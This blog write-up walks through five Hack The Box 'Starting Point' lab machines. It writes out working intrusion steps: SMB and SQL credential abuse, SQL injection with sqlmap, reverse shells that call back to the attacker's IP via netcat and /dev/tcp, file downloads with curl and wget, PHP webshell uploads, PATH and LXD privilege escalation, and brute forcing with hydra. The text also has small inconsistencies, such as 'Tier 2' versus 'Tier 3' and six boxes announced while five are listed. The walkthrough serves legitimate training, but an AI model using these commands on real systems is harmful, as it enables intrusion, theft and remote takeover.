Write-up: Hack The Box: Starting Point — Tier 2

Tier 3 of the “Starting Point” series consists of six boxes: Archetype, Oopsie, Vaccine, Included and Markup.

Box 1: Archetype

This box is tagged “Windows”, “SMB” and “SQL”. It turns out we can login to the Windows shares with a guest account and get a shell from there.

Let’s scan it:

The nmap discovery script gives a hint that there might be a guest account which is able to authenticate as user. So let’s try it:

Questions:

• Which TCP port is hosting a database server? 1433
• What is the name of the non-Administrative share available over SMB? backups

We can try to log into the backups share and get a prompt:

$ smbclient \\\\10.129.116.192\\backups -U guest

It enables us to download the file prod.dtsConfig which contains a login password in the ConfiguredValue tag:

<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

Now let’s try to login to the Microsoft SQL server with this password. For this purpose the impacket repository is very helpful.

We can log in with:

impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116 -windows-auth

We are not able to use standard sql-commands such as show databases; however the help command shows that we can execute commands by calling the xp_cmdshell.

• What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
• What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell

With this, we can browse the directories and get the user flag. Now let’s try to get the root flag as well. For this we need to escalate to administrator privileges.

I tried to upload winpeas.exe to the server, but couldn't execute it because of missing privileges. So first of all, let's escalate our xp_cmdshell with help of the commands specified in this cheatsheet.

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; - Enabling the sp_configure as stated in the above error message EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE

Instead of running winpeas on the server directly, let's try to establish a netcat session first. For this, we can download nc.exe to the svc_sql user's folder. First we establish a HTTP server on our local folder and open the listener:

$ python3 -m http.server 80 $ sudo nc -lnvp 443

And then download it to the server and call it:

SQL> xp_cmdshell curl http://10.10.14.71/nc.exe --output C:\Users\sql_svc\nc.exe SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 10.10.14.71 443"

Now we have a shell! Now let’s run winpeas again. We need to download it by clicking on the “raw” file (this was where I went wrong before). Then we upload it and run it just like before with nc.exe. It returns a lot of output, among others a readable console history file.

When we open it, we get the admin password.

• What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
• What file contains the administrator’s password? MEGACORP_4dm1n!!

With this, we can log in as admin user using the Impacket psexec.py package and find the root flag on the administrator's desktop.

$ impacket-psexec administrator@10.129.116.192

• Submit user flag — Try by yourself!
• Submit root flag — Try by yourself!

Box 2: Oopsie

This box is tagged “Linux”, “Web”, “PHP” and “SUID”. It turns out we can log into the web application by modifying the cookies, then upload a reverse shell and use the suid bit of a Linux binary to get root privileges.

Questions:

We see that there is a web service running on port 80. It is showing us a landing page of a company called “MegaCorp”. There is a hint that we might be able to login (“Please login to get access to the service”), but the login button is nowhere to be found.

dirb and gobuster don't find any path either. So let's check it with a Burp proxy as the last question suggested. Under the "Target" tab we can check the page's sitemap:

Besides the css/, themes/ and js/ folders that were already found with dirb, we also find a very interesting cdn-cgi/login link, which leads us to a login page.

• What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
• What can be modified in Firefox to get access to the upload page? cookie

The page offers the opportunity to login as guest, so let’s do this and check what happens behind the scenes in Burp. We get re-directed to a page called login/admin.php. It shows the "Repair Management System". It seems that we might be able to login as admin user if we find the right user/role combination.

We can send it to Burp Intruder and test all numbers from 1 to 100 for the role “admin”. In order to generate a file with all numbers, we can use a little shell script.

i=0 while [ $i -le 200 ] do echo $i >> numbers.txt i=$(($i+1)) done

Then we can read the numbers.txt file to Burp. This will test the user-numbers 0 to 200 in combination with the usernames "admin", "superadmin" and "administrator". However, all of these tests run unsuccessful, so let's return to the page and check some more. Interestingly, we can check a page called accounts, which simply passes the account ID using a GET request in the URL.

The account ID is not equal to the access ID. It turns out we can change the ID and return arbitrary results — most importantly, the admin user with id 1 and access ID 34322.

Whit this knowledge, we can modify our cookie to login as admin user with help of the Match & Replace utility in Burp. Now we can view the “Upload” panel which required admin rights. If we upload an arbitrary file, we don’t see where it has been uploaded.

However, our previous scan with dirb revealed that there is a folder called uploads. In this folder, we can access the document (test.jpg) under its plaintext name.

This calls for a shell. Since the website is running on PHP, let’s try to upload a PHP reverse shell, for example the White Winter Wolf interactive shell. It is accepted, and when we visit the uploads-Folder, we get a webshell. Now we can search the directory for interesting files.

Ö which nc reveals that the server has netcat installed. However it turns out that -c and -e options are disabled so that we can't connect to the outside. Instead, let's use a different webshell, php-reverse-shell from the /usr/shared folder. Using this, we immediately get a shell on the system and can read the user flag from Robert. Before that, we spawn the shell to a full tty with python3 -c 'import pty; pty.spawn("/bin/sh")'.

Also, we find some MySQL connection info in the db.php file of the www directory:

<?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?>

It turns out that we can log in as user robert with su - robert and this password.

Let’s investigate the robert user further. He belongs to the group bugtracker:

$ groups robert robert : robert bugtracker

(better enumeration is with id). sudo -l shows that he has no sudo-permissions on the system. Let's see if the bugtracker group is more powerful.

$ find / -group bugtracker 2>/dev/null

reveals all files that belong to the bugtracker group. In our case it’s only one,/usr/bin/bugtracker. We can try to modify that one, and it has the "s"-bit set for Set User Id Upon Execution (setuid).

$ ls -l /usr/bin/bugtracker -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker $ file /usr/bin/bugtracker /usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

The setuid means that the program is running with root privileges even if it is started as user robert, because a file with SUID always executes as the user who owns the file (regardless of the user passing the command).

• What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
• Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? root
• What SUID stands for? Set owner User ID

Let’s run the script to see what it does:

It collects some data out of files. Let’s try it again with a less likely number:

And we see that the program calls the cat command. Note that it only calls cat, not /bin/cat. This means that we might be able to overwrite the cat command by a local command when we add the command directory to the beginning of the path.

The current path is:

robert@oopsie:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

so let’s add a local path tmp with a new binary.

robert@oopsie:~$ export PATH=/tmp:$PATH

Now the tmp folder is searched before the /bin folder. There we create a file cat with the following content: /bin/sh and make it executable. Now we get the root shell and can submit the root flag.

• What is the name of the executable being called in an insecure manner? cat
• Submit user flag — Try by yourself!
• Submit root flag — Try by yourself!

Box 3: Vaccine

This box is tagged “Linux”, “FTP”, “SQL” and “SUID”.

The nmap scan shows that there is an FTP server which allowes anonymous login and provides a file called backup.zip. We can download it and try to unzip, but it requires a password.

• Besides SSH and HTTP, what other service is hosted on this box? FTP
• This service can be configured to allow login with any password for specific username. What is that username? anonymous
• What is the name of the file downloaded over this service? backup.zip

Also, we have a Webserver on port 80 called “MegaCorp Login” with a login page. I tried to bomb it with the default credentials, but there was no hit.

So let’s go back to the backup.zip-file and try to crack it. We can use zip2john for this, following this tutorial. First we generate the hash file, and then we crack it using the standard wordlist from john.

$ zip2john backup.zip > hash.txt $ john hash.txt $ unzip backup.zip

The password is 741852963 (= a pattern on a num pad).

And in the backup file, we find a hard-coded password:

<?php session_start(); if(isset($_POST['username']) && isset($_POST['password'])) { if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") { $_SESSION['login'] = "true"; header("Location: dashboard.php"); } } ?>

Let’s see if it still works. First we need to convert the md5 hash back to a plain text password. Let’s use hashcat for this. First we double-check that the password is really an md5 using hashid -m <hash>. Then we can run it first with a short list, but without success. Howevr, with rockyou.txt we get the answer within seconds.

We get redirected to the dashboard. There we get a table with database output. The search string is submitted via an URL parameter.

Let’s see if SQL injection is possible here. For example, we can enumerate the number of columns by injecting ' ORDER BY X-- -. With 6, we get an error message:

But we can also do it the easy way and use sqlmap. With this command, we get a shell as postgres user:

$ sqlmap -u 'http://10.129.117.4/dashboard.php' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell

Then we get a very simple shell, but we need to expand it. Unfortunately most commands from this cheatsheet don’t work, and calling a shell with netcat doesn’t work either although it’s installed on the server. However we can get a shell with the following bash command:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.71/443 0>&1"

After that we can stabilize the shell with python3 -c 'import pty; pty.spawn("/bin/bash")'. From there we can get the user flag. Now let's see if we can find any password, because often the database is connected from PHP using a cleartext password. And indeed, we find it in the www folder in the dashboard.php file:

try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }

Maybe the local user postgres is using the same password. Let's try by calling sudo -l, which should deliver us all executables that the user is allowed to use.

Nice! According to GTFOBins, we can spawn a root shell with this. Let’s run the command: sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf. The output is rather strange as we don't have a fully functional terminal, but typing :!/bin/sh works anyway and we get a root shell.

• What program can the postgres user run as root using sudo? vi
• Submit user flag — Try by yourself!
• Submit root flag — Try by yourself!

Box 4: Included

This box is tagged “Linux”, “FTP”, “Java”, “PHP” and “LFI”.

The regular Top-1000 nmap scan is returning only a webserver on port 80. Since the next question is asking for a UDP port, let’s check that additionally.

Scanning for the top 100 UDP ports returns a dhcpc service on port 68 and a tftp service on port 69.

We can access the service without password, but directory listing is not possibe and thus we don’t know which files could potentially be downloaded.

Next, let’s check the webserver running on port 80. The start page already shows that some file is included.

It turns out we can even access files outside of the web directory.

In order to exploit the vulnerability, we further enumerate the server. gobuster doesn't reveal any further interesting directories, but reveals that the files .htaccess and .htpasswd might exist on the server.

And correct, we find the credentials for the user Mike in cleartext in the .htpasswd file.

Besides the password file, we might also use the open TFTP server to upload a webshell and execute it via the LFI. Let’s create a shell with meterpreter:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f raw > shell.php

Before we upload the shell, we need to remove the comment from the beginning of the file and add a ?> to the end. Next, we upload this shell to the TFT server (with put shell.php) and start the listener with msfconsole. Then we access the file at ?file=/var/lib/tftpboot/shell.php, but unfortunately the session fails.

Next try is with the /usr/share/webhsells/php/php-reverse-shell.php from Kali Linux. This one works and we get a shell:

• What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
• Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd

Now let’s login as user Mike and see what else we can do there. sudo -l returns nothing helpful, but Mike is part of the lxd-group. We will see how to use that.

According to this article, we can escalate to root privileges if we follow the steps described there.

These are teh steps: On our machine, we download the alpine image and create the tar.gz-File.

git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder ./build-alpine

Then we start a python web server on our machine and fetch the file with wget from the victim machine. After that we follow the commands from the blog post and get root privileges.

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage lxc image list lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh

• What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
• If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
• Submit user flag — Try by yourself!
• Submit root flag — Try by yourself!

Box 5: Markup

This box is tagged “Windows” and “XXE”.

The nmap scan reveals a web server on port 80 and 443 as well as a SSH server on port 22.

Visiting the website, we see a login page.

We can catch the POST-Request to the webserver with Burp Suite. We see that it uses the payload username=xx&password=yy and returns "Wrong Credentials" if the password is wrong.

We can feed this information into hydra and run a brute force scan. After a few trials, we get a hit.

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwo rds/Common-Credentials/best15.txt 10.129.108.32 http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials" -V

The combination that works is admin:password.

We get to a very simple shop system. The “Order” tab is accepting user input.

Let’s see how it looks like in Burp:

The user input is processed as XML-data. So maybe we can use XXE Injection attack (XML External Entity) on that.

• What is the word at the top of the page that accepts user input? order
• What XML version is used on the target? 1.0
• What does the XXE / XEE attack acronym stand for? XML External Entity

But first, let’s enumerate further. We can find a user “Daniel” in the source code:

Who knows, maybe Daniel still has an account on the server?

Now let’s try to exploit the XXE. Here are some useful payloads. Unfortunately I didn’t manage to get this without the walkthrough, because I was trying a little different payload and a different file.

Next, we can try to see if “Daniel” has an account on the machine, and if we might even be able to access his ssh-keys. And yes, it works:

We copy the content to a file and adjust the permissions with chmod 600 id_rsa. Then we can login:

$ ssh daniel@10.129.108.32 -i id_rsa

After a bit of poking, we find an interesting folder called “log-management” with a bat-file inside.

This is the file content:

We can see that it calls the executable wevutil.exe without specifying the path, and it uses administrator privileges. Let's double-check the privileges with icacls:

Since we have full writing permissions on the file, we can modify it to execute our own program, for example netcat. First we get nc.exe to the victim machine. Then we simply overwrite the job.bat file with our content.

PS > wget http://10.10.16.18/nc64.exe -O nc.exe PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443" > C:\Log-Management\job.bat PS > type job.bat C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443

In the beginning I tried the exploit with the nc.exe file from the /usr/share/windows-resources/binaries/ folder on Kali, but it didn't work. So I downloaded nc64.exe from Github. After a few seconds, I received the shell.

• Submit user flag — Try by yourself!
• Submit root flag — Try by yourself!

Originally published at https://www.cyberjazz.de on February 2, 2022.